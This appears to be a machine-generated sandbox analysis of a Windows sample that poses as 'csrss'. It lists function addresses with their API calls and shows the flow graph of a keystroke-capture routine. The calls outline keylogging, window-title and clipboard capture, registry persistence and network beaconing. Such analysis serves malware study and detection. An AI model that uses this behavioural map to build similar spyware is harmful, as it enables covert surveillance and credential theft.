LoadLibraryA 33415->33771 33419 33d4ea49 33419->33371 33420 33d4ec02 33421 33d4d069 2 API calls 33420->33421 33423 33d4ec08 33421->33423 33422 33d4ebae 33422->33420 33424 33d53549 3 API calls 33422->33424 33423->33419 33780 33d5b2c3 33423->33780 33431 33d4ebe6 33424->33431 33425 33d4e9fd 33425->33419 33425->33422 33426 33d53549 3 API calls 33425->33426 33428 33d4eba4 33426->33428 33428->33422 33430 33d4f34f 33428->33430 33429 33d4ec23 33433 33d47716 3 API calls 33429->33433 33437 33d4ec76 33429->33437 33883 33d539a9 RegOpenKeyExW RegDeleteValueW 33430->33883 33431->33420 33859 33d539a9 RegOpenKeyExW RegDeleteValueW 33431->33859 33435 33d4ec3e 33433->33435 33438 33d4ec42 33435->33438 33447 33d4ec4c 33435->33447 33436 33d4f365 33884 33d52475 36 API calls 33436->33884 33441 33d4ec8b 33437->33441 33456 33d4ec90 33437->33456 33860 33d47738 RegOpenKeyExW RegDeleteValueW 33438->33860 33863 33d47755 CreateProcessA 33441->33863 33442 33d4ec47 33861 33d47260 6 API calls 33442->33861 33445 33d4f34d 33817 33d53a23 RegOpenKeyExW 33445->33817 33447->33437 33448 33d4ec71 33447->33448 33862 33d47260 6 API calls 33448->33862 33450 33d4f392 33820 33d4dd42 33450->33820 33454 33d4f3af 33455 33d4ed8a 33457 33d4ed93 33455->33457 33463 33d4ee0f 33455->33463 33462 33d4ed66 33456->33462 33864 33d4da34 33456->33864 33874 33d4cdf9 14 API calls 33457->33874 33458 33d4ef06 33876 33d536f8 RegOpenKeyExA 33458->33876 33461 33d4ef51 33793 33d5376f RegCreateKeyA 33461->33793 33462->33455 33462->33458 33789 33d53947 33463->33789 33467 33d4ee0a 33467->33463 33468 33d4eea3 33468->33461 33473 33d4eece 33468->33473 33469 33d4efc1 33879 33d5cd9b 8 API calls 33469->33879 33470 33d4ef9e 33470->33469 33474 33d4efe4 33470->33474 33472 33d4efc8 33472->33474 33875 33d4f474 56 API calls 33473->33875 33797 33d5b4ef 33474->33797 33476 33d4eee8 33476->33461 33477 33d4eeef 33476->33477 33477->33419 33479 33d4f00d 33480 33d4f0a1 StrToIntA 33479->33480 33801 33d49de4 33480->33801 33482 33d4f1a6 33483 33d4f21a 33482->33483 33490 33d4f1e1 33482->33490 33810 33d5b60d GetComputerNameExW GetUserNameW 33483->33810 33485 33d4f0b3 33485->33482 33880 33d4d9e8 GetLongPathNameW GetModuleFileNameW GetCurrentProcess IsWow64Process 33485->33880 33487 33d4f223 33488 33d4f240 SetProcessDEPPolicy 33487->33488 33489 33d4f243 CreateThread 33487->33489 33488->33489 33494 33d4f258 33489->33494 34184 33d4f7a7 33489->34184 33881 33d4c162 7 API calls 33490->33881 33492 33d4f2c0 33814 33d534ff RegOpenKeyExA 33492->33814 33494->33492 33496 33d5b4ef GetLocalTime 33494->33496 33495 33d4f2e4 33495->33450 33882 33d5361b RegOpenKeyExW RegQueryValueExW RegCloseKey 33495->33882 33496->33492 33498 33d4f313 33498->33445 33499 33d4f334 Sleep 33498->33499 33500 33d41f04 33499->33500 33500->33498 34203 33d41fab 33501->34203 33503 33d4d073 CreateMutexA GetLastError 33503->33371 33504->33357 33505->33364 33506->33373 33507->33374 33508->33375 33509->33379 33510->33386 33512 33d78f36 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 33511->33512 33524 33d7a43a 33512->33524 33515 33d78f44 33515->33388 33517 33d78f4c 33518 33d78f57 33517->33518 33538 33d7a476 RtlDeleteCriticalSection 33517->33538 33518->33388 33566 33d8fb68 33520->33566 33523 33d78f5a 8 API calls 3 library calls 33523->33389 33525 33d7a443 33524->33525 33527 33d7a46c 33525->33527 33528 33d78f40 33525->33528 33539 33d78e7f 33525->33539 33544 33d7a476 RtlDeleteCriticalSection 33527->33544 33528->33515 33530 33d7a3ec 33528->33530 33559 33d78d94 33530->33559 33532 33d7a3f6 33533 33d7a401 33532->33533 33564 33d78e42 6 API calls try_get_function 33532->33564 33533->33517 33535 33d7a40f 33536 33d7a41c 33535->33536 33565 33d7a41f 6 API calls ___vcrt_FlsFree 33535->33565 33536->33517 33538->33515 33545 33d78c73 33539->33545 33542 33d78eb6 InitializeCriticalSectionAndSpinCount 33543 33d78ea2 33542->33543 33543->33525 33544->33528 33546 33d78ca7 33545->33546 33549 33d78ca3 33545->33549 33546->33542 33546->33543 33547 33d78cc7 33547->33546 33550 33d78cd3 GetProcAddress 33547->33550 33549->33546 33549->33547 33552 33d78d13 33549->33552 33551 33d78ce3 __crt_fast_encode_pointer 33550->33551 33551->33546 33553 33d78d3b LoadLibraryExW 33552->33553 33557 33d78d30 33552->33557 33554 33d78d57 GetLastError 33553->33554 33555 33d78d6f 33553->33555 33554->33555 33558 33d78d62 LoadLibraryExW 33554->33558 33556 33d78d86 FreeLibrary 33555->33556 33555->33557 33556->33557 33557->33549 33558->33555 33560 33d78c73 try_get_function 5 API calls 33559->33560 33561 33d78dae 33560->33561 33562 33d78dc6 TlsAlloc 33561->33562 33563 33d78db7 33561->33563 33563->33532 33564->33535 33565->33533 33569 33d8fb81 33566->33569 33568 33d745bd 33568->33392 33568->33523 33570 33d74fcb 33569->33570 33571 33d74fd6 IsProcessorFeaturePresent 33570->33571 33572 33d74fd4 33570->33572 33574 33d75018 33571->33574 33572->33568 33577 33d74fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33574->33577 33576 33d750fb 33576->33568 33577->33576 33579 33d74b27 GetStartupInfoW 33578->33579 33579->33405 33581 33d8f062 33580->33581 33582 33d8f06b 33580->33582 33585 33d8ef58 33581->33585 33582->33408 33584->33408 33605 33d88215 GetLastError 33585->33605 33587 33d8ef65 33625 33d8f077 33587->33625 33589 33d8ef6d 33634 33d8ecec 33589->33634 33594 33d8efc7 33659 33d86782 20 API calls _free 33594->33659 33598 33d8efc2 33658 33d805dd 20 API calls _free 33598->33658 33599 33d8ef84 33599->33582 33601 33d8f00b 33601->33594 33661 33d8ebc2 26 API calls 33601->33661 33602 33d8efdf 33602->33601 33660 33d86782 20 API calls _free 33602->33660 33606 33d8822b 33605->33606 33607 33d88231 33605->33607 33662 33d887bc 11 API calls 2 library calls 33606->33662 33611 33d88280 SetLastError 33607->33611 33663 33d85af3 20 API calls 3 library calls 33607->33663 33610 33d88243 33612 33d8824b 33610->33612 33665 33d88812 11 API calls 2 library calls 33610->33665 33611->33587 33664 33d86782 20 API calls _free 33612->33664 33614 33d88260 33614->33612 33616 33d88267 33614->33616 33666 33d88087 20 API calls _free 33616->33666 33617 33d88251 33618 33d8828c SetLastError 33617->33618 33668 33d860f4 38 API calls _abort 33618->33668 33620 33d88272 33667 33d86782 20 API calls _free 33620->33667 33624 33d88279 33624->33611 33624->33618 33626 33d8f083 ___BuildCatchObject 33625->33626 33627 33d88215 __Toupper 38 API calls 33626->33627 33631 33d8f08d 33627->33631 33629 33d8f111 ___BuildCatchObject 33629->33589 33631->33629 33669 33d860f4 38 API calls _abort 33631->33669 33670 33d85888 RtlEnterCriticalSection 33631->33670 33671 33d86782 20 API calls _free 33631->33671 33672 33d8f108 RtlLeaveCriticalSection std::_Lockit::~_Lockit 33631->33672 33673 33d7a7b7 33634->33673 33637 33d8ed0d GetOEMCP 33640 33d8ed36 33637->33640 33638 33d8ed1f 33639 33d8ed24 GetACP 33638->33639 33638->33640 33639->33640 33640->33599 33641 33d86137 33640->33641 33642 33d86175 33641->33642 33646 33d86145 __Getctype 33641->33646 33684 33d805dd 20 API calls _free 33642->33684 33644 33d86160 RtlAllocateHeap 33645 33d86173 33644->33645 33644->33646 33645->33594 33648 33d8f119 33645->33648 33646->33642 33646->33644 33683 33d82f80 7 API calls 2 library calls 33646->33683 33649 33d8ecec 40 API calls 33648->33649 33650 33d8f138 33649->33650 33653 33d8f189 IsValidCodePage 33650->33653 33655 33d8f13f 33650->33655 33657 33d8f1ae ___scrt_get_show_window_mode 33650->33657 33651 33d74fcb CatchGuardHandler 5 API calls 33652 33d8efba 33651->33652 33652->33598 33652->33602 33654 33d8f19b GetCPInfo 33653->33654 33653->33655 33654->33655 33654->33657 33655->33651 33685 33d8edc4 GetCPInfo 33657->33685 33658->33594 33659->33599 33660->33601 33661->33594 33662->33607 33663->33610 33664->33617 33665->33614 33666->33620 33667->33624 33670->33631 33671->33631 33672->33631 33674 33d7a7d4 33673->33674 33675 33d7a7ca 33673->33675 33674->33675 33676 33d88215 __Toupper 38 API calls 33674->33676 33675->33637 33675->33638 33677 33d7a7f5 33676->33677 33681 33d88364 38 API calls __Toupper 33677->33681 33679 33d7a80e 33682 33d88391 38 API calls __fassign 33679->33682 33681->33679 33682->33675 33683->33646 33684->33645 33686 33d8eea8 33685->33686 33692 33d8edfe 33685->33692 33689 33d74fcb CatchGuardHandler 5 API calls 33686->33689 33691 33d8ef54 33689->33691 33691->33655 33695 33d9112c 33692->33695 33694 33d8ae66 43 API calls 33694->33686 33696 33d7a7b7 __fassign 38 API calls 33695->33696 33697 33d9114c MultiByteToWideChar 33696->33697 33699 33d9118a 33697->33699 33700 33d91222 33697->33700 33703 33d86137 ___crtLCMapStringA 21 API calls 33699->33703 33706 33d911ab ___crtLCMapStringA ___scrt_get_show_window_mode 33699->33706 33701 33d74fcb CatchGuardHandler 5 API calls 33700->33701 33704 33d8ee5f 33701->33704 33702 33d9121c 33714 33d75e40 20 API calls _free 33702->33714 33703->33706 33709 33d8ae66 33704->33709 33706->33702 33707 33d911f0 MultiByteToWideChar 33706->33707 33707->33702 33708 33d9120c GetStringTypeW 33707->33708 33708->33702 33710 33d7a7b7 __fassign 38 API calls 33709->33710 33711 33d8ae79 33710->33711 33715 33d8ac49 33711->33715 33714->33700 33716 33d8ac64 ___crtLCMapStringA 33715->33716 33717 33d8ac8a MultiByteToWideChar 33716->33717 33718 33d8acb4 33717->33718 33727 33d8ae3e 33717->33727 33721 33d86137 ___crtLCMapStringA 21 API calls 33718->33721 33723 33d8acd5 ___crtLCMapStringA 33718->33723 33719 33d74fcb CatchGuardHandler 5 API calls 33720 33d8ae51 33719->33720 33720->33694 33721->33723 33722 33d8ad1e MultiByteToWideChar 33724 33d8ad37 33722->33724 33738 33d8ad8a 33722->33738 33723->33722 33723->33738 33742 33d88bb3 33724->33742 33727->33719 33729 33d8ad99 33731 33d86137 ___crtLCMapStringA 21 API calls 33729->33731 33736 33d8adba ___crtLCMapStringA 33729->33736 33730 33d8ad61 33733 33d88bb3 std::_Locinfo::_Locinfo_ctor 11 API calls 33730->33733 33730->33738 33731->33736 33732 33d8ae2f 33750 33d75e40 20 API calls _free 33732->33750 33733->33738 33734 33d88bb3 std::_Locinfo::_Locinfo_ctor 11 API calls 33737 33d8ae0e 33734->33737 33736->33732 33736->33734 33737->33732 33739 33d8ae1d WideCharToMultiByte 33737->33739 33751 33d75e40 20 API calls _free 33738->33751 33739->33732 33740 33d8ae5d 33739->33740 33752 33d75e40 20 API calls _free 33740->33752 33753 33d884ca 33742->33753 33746 33d88be3 33748 33d74fcb CatchGuardHandler 5 API calls 33746->33748 33747 33d88c23 LCMapStringW 33747->33746 33749 33d88c35 33748->33749 33749->33729 33749->33730 33749->33738 33750->33738 33751->33727 33752->33738 33754 33d884fa 33753->33754 33755 33d884f6 33753->33755 33754->33746 33760 33d88c3b 10 API calls 3 library calls 33754->33760 33755->33754 33757 33d8851a 33755->33757 33761 33d88566 33755->33761 33757->33754 33758 33d88526 GetProcAddress 33757->33758 33759 33d88536 __crt_fast_encode_pointer 33758->33759 33759->33754 33760->33747 33762 33d88587 LoadLibraryExW 33761->33762 33766 33d8857c 33761->33766 33763 33d885bc 33762->33763 33764 33d885a4 GetLastError 33762->33764 33763->33766 33767 33d885d3 FreeLibrary 33763->33767 33764->33763 33765 33d885af LoadLibraryExW 33764->33765 33765->33763 33766->33755 33767->33766 33769 33d535a0 33768->33769 33770 33d53573 RegQueryValueExA RegCloseKey 33768->33770 33769->33414 33770->33769 33772 33d5cb70 LoadLibraryA 33771->33772 33774 33d5cb9f LoadLibraryA 33772->33774 33776 33d4e9e1 GetModuleFileNameW 33774->33776 33777 33d4f3c3 33776->33777 33885 33d5b4a8 FindResourceA 33777->33885 33779 33d4f3de 33779->33425 33888 33d5bfb7 33780->33888 33784 33d5b2ef 33785 33d535a6 3 API calls 33784->33785 33788 33d5b349 33784->33788 33786 33d5b330 33785->33786 33787 33d5b33b StrToIntA 33786->33787 33787->33788 33788->33429 33790 33d53965 33789->33790 33791 33d5376f 3 API calls 33790->33791 33792 33d53994 33791->33792 33792->33468 33794 33d537bf 33793->33794 33795 33d53788 33793->33795 33794->33470 33796 33d5379a RegSetValueExA RegCloseKey 33795->33796 33796->33794 33798 33d5b505 GetLocalTime 33797->33798 33799 33d5b5a0 33797->33799 33800 33d5b547 33798->33800 33799->33479 33800->33799 33802 33d49e02 33801->33802 33803 33d49e24 33802->33803 33804 33d49e0d 33802->33804 33805 33d4da34 4 API calls 33803->33805 33806 33d4da34 4 API calls 33804->33806 33807 33d49e15 33805->33807 33806->33807 33895 33d4a109 33807->33895 33811 33d5b65c 33810->33811 33989 33d442fc 33811->33989 33813 33d5b668 33813->33487 33815 33d53520 RegQueryValueExA RegCloseKey 33814->33815 33816 33d53542 33814->33816 33815->33816 33816->33495 33818 33d53a3f RegDeleteValueW 33817->33818 33819 33d53a3b 33817->33819 33818->33819 33819->33450 33821 33d4dd5b 33820->33821 33822 33d534ff 3 API calls 33821->33822 33823 33d4dd62 33822->33823 33824 33d4dd81 33823->33824 34031 33d41707 33823->34031 33828 33d54f2a 33824->33828 33826 33d4dd6f 34034 33d53877 RegCreateKeyA 33826->34034 33829 33d54f3e 33828->33829 33830 33d54f74 Sleep 33829->33830 33831 33d54f81 33829->33831 33830->33831 34057 33d4489e WSAStartup 33831->34057 33833 33d54fb6 33854 33d5503e 33833->33854 34125 33d4473d GetLocalTime 33833->34125 33835 33d5b4ef GetLocalTime 33835->33854 33837 33d5518c WSAGetLastError 34126 33d5cae1 FormatMessageA LocalFree 33837->34126 33843 33d5519c 33844 33d55acf Sleep 33843->33844 33843->33854 33857 33d5b4ef GetLocalTime 33843->33857 33858 33d55a71 CreateThread 33843->33858 34128 33d4b051 6 API calls 33843->34128 34129 33d44e26 8 API calls 33843->34129 33844->33843 33846 33d536f8 3 API calls 33846->33854 33847 33d535a6 3 API calls 33847->33854 33849 33d55439 GetTickCount 33849->33854 33854->33835 33854->33837 33854->33843 33854->33846 33854->33847 33854->33849 34058 33d54ee9 33854->34058 34063 33d4482d 33854->34063 34070 33d44f51 33854->34070 34079 33d448c8 connect 33854->34079 34103 33d5b7e0 33854->34103 34106 33d4dd89 33854->34106 34112 33d5bae6 GetLastInputInfo GetTickCount 33854->34112 34113 33d5ba96 33854->34113 34116 33d4f8d1 GetLocaleInfoA 33854->34116 34117 33d44c10 33854->34117 34127 33d44aa1 send WaitForSingleObject SetEvent 33854->34127 33857->33843 33858->33843 34182 33d5ad17 16 API calls 33858->34182 33859->33420 33860->33442 33861->33447 33862->33437 33863->33456 33865 33d4da50 33864->33865 33866 33d4daa5 33865->33866 33867 33d4da70 33865->33867 33868 33d4da66 33865->33868 33871 33d5bfb7 2 API calls 33866->33871 34183 33d5b5b4 GetModuleFileNameW 33867->34183 33870 33d4db99 GetLongPathNameW 33868->33870 33873 33d4dbae 33870->33873 33871->33868 33872 33d4da79 33872->33868 33873->33462 33874->33467 33875->33476 33877 33d5371e RegQueryValueExA RegCloseKey 33876->33877 33878 33d53742 33876->33878 33877->33878 33878->33461 33879->33472 33880->33482 33881->33483 33882->33498 33883->33436 33886 33d5b4c5 LoadResource LockResource SizeofResource 33885->33886 33887 33d5b4ec 33885->33887 33886->33887 33887->33779 33889 33d5bfc4 GetCurrentProcess IsWow64Process 33888->33889 33890 33d5b2d1 33888->33890 33889->33890 33891 33d5bfdb 33889->33891 33892 33d535a6 RegOpenKeyExA 33890->33892 33891->33890 33893 33d535d4 RegQueryValueExA RegCloseKey 33892->33893 33894 33d535fe 33892->33894 33893->33894 33894->33784 33896 33d4a127 33895->33896 33897 33d53549 3 API calls 33896->33897 33898 33d4a12e 33897->33898 33899 33d4a142 33898->33899 33900 33d4a15c 33898->33900 33901 33d49e9b 33899->33901 33902 33d4a147 33899->33902 33906 33d4a179 33900->33906 33901->33485 33917 33d4a22d CreateThread 33902->33917 33905 33d4a15a 33905->33901 33907 33d4a197 33906->33907 33908 33d4a1ca 33907->33908 33909 33d4a1a2 33907->33909 33910 33d5b4ef GetLocalTime 33908->33910 33918 33d4b164 SetEvent GetLocalTime wsprintfW 33909->33918 33912 33d4a1e9 CreateThread 33910->33912 33914 33d4a204 CreateThread 33912->33914 33915 33d4a210 CreateThread 33912->33915 33925 33d4a27d 33912->33925 33913 33d4a1c1 33913->33908 33914->33915 33922 33d4a267 33914->33922 33916 33d4a224 33915->33916 33919 33d4a289 33915->33919 33916->33901 33917->33905 33988 33d4a273 69 API calls 33917->33988 33918->33913 33928 33d4acd6 33919->33928 33921 33d4a292 33941 33d4a2b8 33922->33941 33924 33d4a270 33949 33d4a726 33925->33949 33937 33d4ace4 33928->33937 33929 33d4aedc 33929->33921 33930 33d4ad3e Sleep GetForegroundWindow GetWindowTextLengthW 33930->33937 33932 33d4ad84 GetWindowTextW 33932->33937 33933 33d5bae6 GetLastInputInfo GetTickCount 33933->33937 33934 33d4ae49 Sleep 33934->33937 33935 33d4add1 33935->33937 33939 33d4b164 SetEvent GetLocalTime wsprintfW 33935->33939 33937->33929 33937->33930 33937->33932 33937->33933 33937->33934 33937->33935 33938 33d4a636 SetEvent 33937->33938 33940 33d4b748 SetEvent OpenClipboard GetClipboardData CloseClipboard 33937->33940 33938->33937 33939->33935 33940->33937 33942 33d4a2d1 GetModuleHandleA SetWindowsHookExA 33941->33942 33943 33d4a333 GetMessageA 33941->33943 33942->33943 33946 33d4a2ed GetLastError 33942->33946 33944 33d4a345 TranslateMessage DispatchMessageA 33943->33944 33945 33d4a322 33943->33945 33944->33943 33944->33945 33945->33924 33947 33d4a2fe 33946->33947 33948 33d5b4ef GetLocalTime 33947->33948 33948->33945 33950 33d4a73b Sleep 33949->33950 33964 33d4a675 33950->33964 33952 33d4a286 33953 33d4a77b CreateDirectoryW 33959 33d4a74d 33953->33959 33954 33d4a78c GetFileAttributesW 33955 33d4a797 33954->33955 33954->33959 33956 33d4a7a3 SetFileAttributesW 33955->33956 33956->33959 33958 33d4a81d PathFileExistsW 33963 33d4a76f 33958->33963 33959->33950 33959->33952 33959->33954 33959->33963 33975 33d5c3f1 33959->33975 33961 33d4a926 SetFileAttributesW 33961->33959 33963->33953 33963->33958 33963->33959 33963->33961 33985 33d5c485 CreateFileW GetFileSize ReadFile CloseHandle 33963->33985 33986 33d5c4f2 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 33963->33986 33965 33d4a722 33964->33965 33969 33d4a68b 33964->33969 33965->33959 33966 33d4a6aa CreateFileW 33967 33d4a6b8 GetFileSize 33966->33967 33966->33969 33968 33d4a6ed CloseHandle 33967->33968 33967->33969 33968->33969 33969->33966 33969->33968 33970 33d4a6e2 Sleep 33969->33970 33971 33d4a6db 33969->33971 33973 33d4a6ff 33969->33973 33970->33968 33987 33d4b0dc SetEvent UnhookWindowsHookEx GetLocalTime wsprintfW GetLocalTime 33971->33987 33973->33965 33974 33d4a179 39 API calls 33973->33974 33974->33965 33976 33d5c404 CreateFileW 33975->33976 33978 33d5c441 33976->33978 33979 33d5c43d 33976->33979 33980 33d5c461 WriteFile 33978->33980 33981 33d5c448 SetFilePointer 33978->33981 33979->33959 33983 33d5c474 33980->33983 33984 33d5c476 CloseHandle 33980->33984 33981->33980 33982 33d5c458 CloseHandle 33981->33982 33982->33979 33983->33984 33984->33979 33985->33963 33986->33963 33987->33970 33992 33d44353 33989->33992 33991 33d4430a 33991->33813 33993 33d4435f 33992->33993 33996 33d44371 33993->33996 33995 33d4436d 33995->33991 33998 33d4437f 33996->33998 33997 33d44385 33997->33995 33998->33997 33999 33d44479 33998->33999 34003 33d4454d 33998->34003 34000 33d444f5 33999->34000 34001 33d4448c 33999->34001 34004 33d44504 33999->34004 34005 33d44506 33999->34005 34000->34004 34022 33d444df 34000->34022 34002 33d44495 34001->34002 34001->34005 34008 33d444a4 34002->34008 34002->34022 34025 33d51cf2 16 API calls 34003->34025 34004->34005 34024 33d44607 send WaitForSingleObject SetEvent 34004->34024 34005->33995 34013 33d444bb Sleep 34008->34013 34010 33d4457c 34010->34005 34011 33d44582 34010->34011 34026 33d51f67 SetLastError 34011->34026 34023 33d44607 send WaitForSingleObject SetEvent 34013->34023 34014 33d4458e 34027 33d51f67 SetLastError 34014->34027 34017 33d444d4 34017->34005 34018 33d4459f 34028 33d51f67 SetLastError 34018->34028 34020 33d445b0 34029 33d51f67 SetLastError 34020->34029 34030 33d44aa1 send WaitForSingleObject SetEvent 34022->34030 34023->34017 34024->34005 34025->34010 34026->34014 34027->34018 34028->34020 34029->34022 34030->34005 34037 33d7aa9a 34031->34037 34035 33d5388f RegSetValueExA RegCloseKey 34034->34035 34036 33d538b9 34034->34036 34035->34036 34036->33824 34040 33d7aa1b 34037->34040 34039 33d4170d 34039->33826 34041 33d7aa3e 34040->34041 34042 33d7aa2a 34040->34042 34047 33d7aa3a __alldvrm 34041->34047 34048 33d88957 34041->34048 34055 33d805dd 20 API calls _free 34042->34055 34045 33d7aa2f 34056 33d7bcec 26 API calls _Xfiopen 34045->34056 34047->34039 34049 33d884ca _free 5 API calls 34048->34049 34050 33d8897e 34049->34050 34051 33d88996 GetSystemTimeAsFileTime 34050->34051 34054 33d8898a 34050->34054 34051->34054 34052 33d74fcb CatchGuardHandler 5 API calls 34053 33d889a7 34052->34053 34053->34047 34054->34052 34055->34045 34056->34047 34057->33833 34059 33d54f02 getaddrinfo WSASetLastError 34058->34059 34060 33d54ef8 34058->34060 34059->33854 34130 33d54d86 34060->34130 34064 33d44846 socket 34063->34064 34065 33d44839 34063->34065 34066 33d44860 CreateEventW 34064->34066 34067 33d44842 34064->34067 34141 33d4489e WSAStartup 34065->34141 34066->33854 34067->33854 34069 33d4483e 34069->34064 34069->34067 34071 33d44fea 34070->34071 34072 33d44f65 34070->34072 34071->33854 34073 33d44f6e 34072->34073 34074 33d44fc0 CreateEventA CreateThread 34072->34074 34075 33d44f7d GetLocalTime 34072->34075 34073->34074 34074->34071 34142 33d45150 34074->34142 34076 33d44f91 34075->34076 34077 33d5b4ef GetLocalTime 34076->34077 34078 33d44fb5 34077->34078 34078->34074 34080 33d44a1b 34079->34080 34088 33d448ee 34079->34088 34081 33d44a21 WSAGetLastError 34080->34081 34099 33d44973 34080->34099 34083 33d44a31 34081->34083 34081->34099 34082 33d44923 34086 33d44941 34082->34086 34087 33d44932 34082->34087 34084 33d44a36 34083->34084 34083->34087 34146 33d5cae1 FormatMessageA LocalFree 34084->34146 34091 33d44987 34086->34091 34094 33d44950 34086->34094 34092 33d5b4ef GetLocalTime 34087->34092 34088->34082 34089 33d5b4ef GetLocalTime 34088->34089 34088->34099 34089->34082 34090 33d44a40 34093 33d5b4ef GetLocalTime 34090->34093 34097 33d44994 34091->34097 34100 33d449c4 34091->34100 34092->34099 34093->34099 34095 33d5b4ef GetLocalTime 34094->34095 34095->34099 34096 33d449f9 CreateEventW CreateEventW 34096->34099 34098 33d5b4ef GetLocalTime 34097->34098 34098->34099 34099->33854 34100->34096 34101 33d5b4ef GetLocalTime 34100->34101 34102 33d449f6 34101->34102 34102->34096 34147 33d5b7b6 GlobalMemoryStatusEx 34103->34147 34105 33d5b7f5 34105->33854 34107 33d4dda5 34106->34107 34108 33d534ff 3 API calls 34107->34108 34110 33d4ddac 34108->34110 34109 33d4ddc4 34109->33854 34110->34109 34111 33d53549 3 API calls 34110->34111 34111->34109 34112->33854 34114 33d5bab5 GetForegroundWindow GetWindowTextW 34113->34114 34115 33d5badf 34114->34115 34115->33854 34116->33854 34122 33d44c27 34117->34122 34119 33d44c96 34120 33d44ca1 34119->34120 34119->34122 34153 33d44e26 8 API calls 34120->34153 34122->34119 34148 33d44cc3 34122->34148 34152 33d44b96 WaitForSingleObject SetEvent recv 34122->34152 34123 33d44ca8 34123->33843 34125->33854 34126->33843 34127->33854 34128->33843 34129->33843 34131 33d54ecf 34130->34131 34132 33d54dc8 GetSystemDirectoryA 34130->34132 34131->34059 34132->34131 34133 33d54de3 LoadLibraryA 34132->34133 34135 33d54e31 34133->34135 34136 33d54e3d 34133->34136 34135->34136 34137 33d54e6e LoadLibraryA 34136->34137 34140 33d54e82 34136->34140 34137->34131 34137->34140 34138 33d54e99 GetProcAddress 34139 33d54eb2 34138->34139 34138->34140 34139->34131 34140->34131 34140->34138 34140->34139 34141->34069 34145 33d4515c 11 API calls 34142->34145 34144 33d45159 34145->34144 34146->34090 34147->34105 34150 33d44cde 34148->34150 34149 33d44e13 34149->34119 34150->34149 34151 33d44dad CreateEventA CreateThread WaitForSingleObject CloseHandle 34150->34151 34151->34150 34154 33d55aea 34151->34154 34152->34122 34153->34123 34176 33d420f6 34154->34176 34156 33d55b0c SetEvent 34157 33d55b21 34156->34157 34158 33d55b86 GetTickCount 34157->34158 34159 33d55d2f 34157->34159 34165 33d57089 34157->34165 34160 33d55b97 34158->34160 34159->34165 34173 33d55cdb 34159->34173 34178 33d5bae6 GetLastInputInfo GetTickCount 34160->34178 34163 33d55cc9 34163->34165 34164 33d55ba3 34166 33d5ba96 2 API calls 34164->34166 34167 33d55bbc 34166->34167 34179 33d44aa1 send WaitForSingleObject SetEvent 34167->34179 34169 33d55c38 34170 33d55cb5 34169->34170 34169->34173 34171 33d55cc3 34170->34171 34172 33d55cce 34170->34172 34180 33d44ff4 GetLocalTime GetLocalTime GetLocalTime 34171->34180 34175 33d44f51 14 API calls 34172->34175 34173->34165 34181 33d450e4 CreateEventA SetEvent WaitForSingleObject CloseHandle GetLocalTime 34173->34181 34175->34163 34177 33d4210c 34176->34177 34177->34156 34178->34164 34179->34169 34180->34163 34181->34163 34183->33872 34186 33d4f7c2 34184->34186 34185 33d53549 3 API calls 34185->34186 34186->34185 34187 33d4f856 Sleep 34186->34187 34190 33d4f866 34186->34190 34194 33d4f7f4 34186->34194 34187->34186 34201 33d53814 RegCreateKeyW RegSetValueExW RegCloseKey 34190->34201 34192 33d5376f 3 API calls 34192->34194 34193 33d4f890 34195 33d5376f 3 API calls 34193->34195 34194->34187 34194->34192 34199 33d4d096 52 API calls 34194->34199 34200 33d53814 RegCreateKeyW RegSetValueExW RegCloseKey 34194->34200 34196 33d4f8c0 34195->34196 34202 33d52850 TerminateProcess WaitForSingleObject 34196->34202 34198 33d4f8c8 ExitProcess 34200->34194 34201->34193 34202->34198 34204 33d42246 34203->34204 34204->33503 34205 33d74875 34210 33d74b47 SetUnhandledExceptionFilter 34205->34210 34207 33d7487a 34211 33d8554b 26 API calls 2 library calls 34207->34211 34209 33d74885 34210->34207 34211->34209 34212 33d55d06 34217 33d5b380 34212->34217 34214 33d55d0f 34224 33d44aa1 send WaitForSingleObject SetEvent 34214->34224 34216 33d55d2a 34218 33d5b38e 34217->34218 34223 33d86137 21 API calls 34218->34223 34219 33d5b39e InternetOpenW InternetOpenUrlW 34220 33d5b3c5 InternetReadFile 34219->34220 34221 33d5b3e8 34220->34221 34221->34220 34222 33d5b415 34221->34222 34222->34214 34223->34219 34224->34216 34225 33d4a3e0 34226 33d4a401 GetForegroundWindow GetWindowThreadProcessId GetKeyboardLayout GetKeyState GetKeyboardState 34225->34226 34227 33d4a463 34226->34227 34228 33d4a4e6 ToUnicodeEx 34227->34228 34229 33d4a468 34227->34229 34228->34228 34228->34229 34230 33d88710 34231 33d884ca _free 5 API calls 34230->34231 34232 33d88737 34231->34232 34233 33d8874f TlsAlloc 34232->34233 34236 33d88740 34232->34236 34233->34236 34234 33d74fcb CatchGuardHandler 5 API calls 34235 33d88760 34234->34235 34236->34234 34237 33d7354a 34240 33d73469 34237->34240 34239 33d73552 34241 33d73482 34240->34241 34242 33d73478 34240->34242 34241->34242 34244 33d73837 CryptAcquireContextA 34241->34244 34242->34239 34245 33d73853 34244->34245 34246 33d73858 CryptGenRandom 34244->34246 34245->34242 34246->34245 34247 33d7386d CryptReleaseContext 34246->34247 34247->34245

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1127 33d4a3e0-33d4a45f GetForegroundWindow GetWindowThreadProcessId GetKeyboardLayout GetKeyState GetKeyboardState 1129 33d4a463-33d4a466 1127->1129 1130 33d4a4d6-33d4a4e2 1129->1130 1131 33d4a468-33d4a46f 1129->1131 1132 33d4a4e6-33d4a502 ToUnicodeEx 1130->1132 1133 33d4a4d0-33d4a4d4 1131->1133 1134 33d4a471-33d4a4c9 1131->1134 1132->1132 1136 33d4a504 1132->1136 1135 33d4a4cd-33d4a4ce 1133->1135 1134->1135 1138 33d4a509-33d4a526 call 33d4417e 1135->1138 1136->1138
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 33D4A416
                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 33D4A422
                                                      • GetKeyboardLayout.USER32(00000000), ref: 33D4A429
                                                      • GetKeyState.USER32(00000010), ref: 33D4A433
                                                      • GetKeyboardState.USER32(?), ref: 33D4A43E
                                                      • ToUnicodeEx.USER32(33DB2B78,?,?,?,00000010,00000000,00000000), ref: 33D4A4FA
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
